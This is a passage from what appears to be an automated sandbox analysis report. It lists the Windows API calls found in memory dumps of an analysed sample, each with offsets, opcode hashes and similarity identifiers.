                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID: 3To
                                                                                                                                          • API String ID: 1269201914-245939750
                                                                                                                                          • Opcode ID: 4ad83faef137195940f6643322eae8622c616cfae0c46d7cad70f9919929ae89
                                                                                                                                          • Instruction ID: 4453fbbea1b574bc73090c270c38709ff6a79640fe994fef78bc61eef438ae1f
                                                                                                                                          • Opcode Fuzzy Hash: 4ad83faef137195940f6643322eae8622c616cfae0c46d7cad70f9919929ae89
                                                                                                                                          • Instruction Fuzzy Hash: 67B012D62DA1C67C720872409E02C7B010CC3C0BE0330813FF615D48B2DE801C422472
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 0010B7BB: GetOEMCP.KERNEL32(00000000,?,?,0010BA44,?), ref: 0010B7E6
                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0010BA89,?,00000000), ref: 0010BC64
                                                                                                                                          • GetCPInfo.KERNEL32(00000000,0010BA89,?,?,?,0010BA89,?,00000000), ref: 0010BC77
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                          • Opcode ID: 80e451dfd88d08226d019cb41863732fe61fad52a5404a95158d4cd2fad35e68
                                                                                                                                          • Instruction ID: eee39cee1a6af62ec47b0e13b2389a586def7feb24335a253bfd43ae420a4091
                                                                                                                                          • Opcode Fuzzy Hash: 80e451dfd88d08226d019cb41863732fe61fad52a5404a95158d4cd2fad35e68
                                                                                                                                          • Instruction Fuzzy Hash: E75156709082499FEB249FB1C8C16FAFBE5EF51308F18446ED4D68B2D2D7B49945CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,000E9A50,?,?,00000000,?,?,000E8CBC,?), ref: 000E9BAB
                                                                                                                                          • GetLastError.KERNEL32(?,00000000,000E8411,-00009570,00000000,000007F3), ref: 000E9BB6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                          • Opcode ID: 1ff51171d6442f0c8b13cb553d19cff2b1fd94d127534e9e6822af5301cfd3ea
                                                                                                                                          • Instruction ID: 63719e1c7bd9c0e63fad1949f2457a4eccfed725e7114006912b5c3c2644edc4
                                                                                                                                          • Opcode Fuzzy Hash: 1ff51171d6442f0c8b13cb553d19cff2b1fd94d127534e9e6822af5301cfd3ea
                                                                                                                                          • Instruction Fuzzy Hash: 3141C271604381CFDB24DF16E6844AEB7E6FFD4310F198A2DE891A3261D7B0ED458B91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 001097E5: GetLastError.KERNEL32(?,00121098,00104674,00121098,?,?,001040EF,?,?,00121098), ref: 001097E9
                                                                                                                                            • Part of subcall function 001097E5: _free.LIBCMT ref: 0010981C
                                                                                                                                            • Part of subcall function 001097E5: SetLastError.KERNEL32(00000000,?,00121098), ref: 0010985D
                                                                                                                                            • Part of subcall function 001097E5: _abort.LIBCMT ref: 00109863
                                                                                                                                            • Part of subcall function 0010BB4E: _abort.LIBCMT ref: 0010BB80
                                                                                                                                            • Part of subcall function 0010BB4E: _free.LIBCMT ref: 0010BBB4
                                                                                                                                            • Part of subcall function 0010B7BB: GetOEMCP.KERNEL32(00000000,?,?,0010BA44,?), ref: 0010B7E6
                                                                                                                                          • _free.LIBCMT ref: 0010BA9F
                                                                                                                                          • _free.LIBCMT ref: 0010BAD5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                          • Opcode ID: d705c88d79d7eae0a7e546ea2d83f34524ffde2473d8d4368fd8d5c369c6ebc1
                                                                                                                                          • Instruction ID: 543125e021344c244c5068f869678b1c3f8f7fd5f739fe03df51302556ef5690
                                                                                                                                          • Opcode Fuzzy Hash: d705c88d79d7eae0a7e546ea2d83f34524ffde2473d8d4368fd8d5c369c6ebc1
                                                                                                                                          • Instruction Fuzzy Hash: EC31D931A08209EFDB14EFA8D581B9D77F5EF50324F254099E9849B2E2EBB25D40DB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E1E55
                                                                                                                                            • Part of subcall function 000E3BBA: __EH_prolog.LIBCMT ref: 000E3BBF
                                                                                                                                          • _wcslen.LIBCMT ref: 000E1EFD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog$_wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2838827086-0
                                                                                                                                          • Opcode ID: 40d44c6d410105df02b0cbea9643767a10fbc12a09638b47a05ef59fc101e431
                                                                                                                                          • Instruction ID: 1e3b7d2d2e698f4d9471d00244fa73dc3d687bdcb9b7f4f4504e2d9b8e95bf58
                                                                                                                                          • Opcode Fuzzy Hash: 40d44c6d410105df02b0cbea9643767a10fbc12a09638b47a05ef59fc101e431
                                                                                                                                          • Instruction Fuzzy Hash: 54312871904249AFCF15DF99C945AEEBBF6AF58300F10006AF895B7252CB325E51DB60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000E73BC,?,?,?,00000000), ref: 000E9DBC
                                                                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 000E9E70
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$BuffersFlushTime
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1392018926-0
                                                                                                                                          • Opcode ID: 6976b4a74d068873b181cd4e341c661c203024c113c5969da6da5b58fb609589
                                                                                                                                          • Instruction ID: b70363db3a9d2dd60adf749ed56380f8af4bb83867af4a61dc9c1751f74fd5f3
                                                                                                                                          • Opcode Fuzzy Hash: 6976b4a74d068873b181cd4e341c661c203024c113c5969da6da5b58fb609589
                                                                                                                                          • Instruction Fuzzy Hash: A821E132249295EFC714DF36C891AABBBE8AF95304F08491CF4C597541D339EA0CDB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000E9F27,?,?,000E771A), ref: 000E96E6
                                                                                                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000E9F27,?,?,000E771A), ref: 000E9716
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                          • Opcode ID: 02f53747673c10e91a523266e7d8dec0ad0a173b04a7d1eefd501681cf610cb8
                                                                                                                                          • Instruction ID: 2c5a2818e736fb6510c849e5d729d209add0dda059a8dac7e9e2000efffc432d
                                                                                                                                          • Opcode Fuzzy Hash: 02f53747673c10e91a523266e7d8dec0ad0a173b04a7d1eefd501681cf610cb8
                                                                                                                                          • Instruction Fuzzy Hash: 2D21C1711043846FE3709A66CC89FF7B7DCEB49324F004A1AFAD5D25D2C774A8849671
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 000E9EC7
                                                                                                                                          • GetLastError.KERNEL32 ref: 000E9ED4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                          • Opcode ID: 8905a3f91c96187bfc3b080043f902143aabb37daf01512abdb62d7e6301aee3
                                                                                                                                          • Instruction ID: 2282e9ff0fa39647ca45fda356f391e0168c66e7f7b5992bd6cf071aa005217e
                                                                                                                                          • Opcode Fuzzy Hash: 8905a3f91c96187bfc3b080043f902143aabb37daf01512abdb62d7e6301aee3
                                                                                                                                          • Instruction Fuzzy Hash: 1611A531600750AFD734C62ACC45BAAB7E9AB45360F504A29E663F26D0D7B1ED45C760
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _free.LIBCMT ref: 00108E75
                                                                                                                                            • Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38
                                                                                                                                          • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00121098,000E17CE,?,?,00000007,?,?,?,000E13D6,?,00000000), ref: 00108EB1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateHeap$_free
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1482568997-0
                                                                                                                                          • Opcode ID: 23c3be5aae82a8bac04726617f7a07788d3b83bce36e36c203e11473a95221bc
                                                                                                                                          • Instruction ID: 33fd229c1e5ed61d6f701d2bdeabb0968b0f93b0c2a901a7a7245d733dfc53fe
                                                                                                                                          • Opcode Fuzzy Hash: 23c3be5aae82a8bac04726617f7a07788d3b83bce36e36c203e11473a95221bc
                                                                                                                                          • Instruction Fuzzy Hash: 97F0F63261D106A6DB253A25DC04BAF37688FA1B70F254125F9D8A61D1DFF0DD4081A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 000F10AB
                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 000F10B2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1231390398-0
                                                                                                                                          • Opcode ID: 625c42738afd8fbda441391f9bf36b1e4ed2ce4cd2cc52a2f7d897aa30e8cf61
                                                                                                                                          • Instruction ID: ea796f85728c4aeeea431891a81f3ea641ac5a7e00f43d47fd68352b74f8a056
                                                                                                                                          • Opcode Fuzzy Hash: 625c42738afd8fbda441391f9bf36b1e4ed2ce4cd2cc52a2f7d897aa30e8cf61
                                                                                                                                          • Instruction Fuzzy Hash: 10E09232B00249E7CF0D87A49C058FB72DDEB442443108175E613D3901FDB0DE8156A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • LoadStringW.USER32(000E13B6,?,00121098,000E13B6), ref: 000EE678
                                                                                                                                          • LoadStringW.USER32(000E13B6,?,00121098), ref: 000EE68F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LoadString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                          • Opcode ID: 3335e6805b9ecc977ba74608535b380ab4993901d1890f84f85f08a14c50628e
                                                                                                                                          • Instruction ID: 4281717aa05f6dccff334945e7ac9d494bc6381b25d0f119701d2118bf13b842
                                                                                                                                          • Opcode Fuzzy Hash: 3335e6805b9ecc977ba74608535b380ab4993901d1890f84f85f08a14c50628e
                                                                                                                                          • Instruction Fuzzy Hash: F3F0FE79100298BFCF115F61EC04CEB7F69EF1A3947004016FE18A5131D23289A19BA4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA501
                                                                                                                                            • Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27
                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA532
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2673547680-0
                                                                                                                                          • Opcode ID: b01a660fb51657a59145eedb6d2a9cc41061420d276149869150dd8ff35a51db
                                                                                                                                          • Instruction ID: 8032f538a0a5fd01ba87d5199907cfbae5e14051508e0deef562118b14df9069
                                                                                                                                          • Opcode Fuzzy Hash: b01a660fb51657a59145eedb6d2a9cc41061420d276149869150dd8ff35a51db
                                                                                                                                          • Instruction Fuzzy Hash: 7EF0A032200249BBDF015F61DC01FDA3BACAF09385F488050B944E5164DB71DAD8EA50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641,000000FF), ref: 000EA1F1
                                                                                                                                            • Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27
                                                                                                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641), ref: 000EA21F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DeleteFile$_wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2643169976-0
                                                                                                                                          • Opcode ID: 1c7ca2e75dd3a2bfae1bb78eebef101e7c64bfa0177ee8ed42c92f5f961f747a
                                                                                                                                          • Instruction ID: 8ee06bdb63b5e9c66d58858f153008a1fbe8f9a617d72a25bba2080144fa9be1
                                                                                                                                          • Opcode Fuzzy Hash: 1c7ca2e75dd3a2bfae1bb78eebef101e7c64bfa0177ee8ed42c92f5f961f747a
                                                                                                                                          • Instruction Fuzzy Hash: C7E092312402496BDB015F65DC45FEA379CAB0C381F484025BA44E2065EB61EEC4DA60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00112641,000000FF), ref: 000FACB0
                                                                                                                                          • OleUninitialize.OLE32(?,?,?,?,00112641,000000FF), ref: 000FACB5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: GdiplusShutdownUninitialize
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3856339756-0
                                                                                                                                          • Opcode ID: 64b9191be207ca0900d7fa198b5bee1493c76d9b80ad3fb57cabbe9fc0f8cf00
                                                                                                                                          • Instruction ID: bc39b90e3f9201fce1f261a14bda783786c677c87b71797d9d04e2fd7f742ac2
                                                                                                                                          • Opcode Fuzzy Hash: 64b9191be207ca0900d7fa198b5bee1493c76d9b80ad3fb57cabbe9fc0f8cf00
                                                                                                                                          • Instruction Fuzzy Hash: 0AE06572604650EFC715AB58DC06B45FBA9FB88B20F104265F416D3BB0CB746841CA90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000EA23A,?,000E755C,?,?,?,?), ref: 000EA254
                                                                                                                                            • Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,000EA23A,?,000E755C,?,?,?,?), ref: 000EA280
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
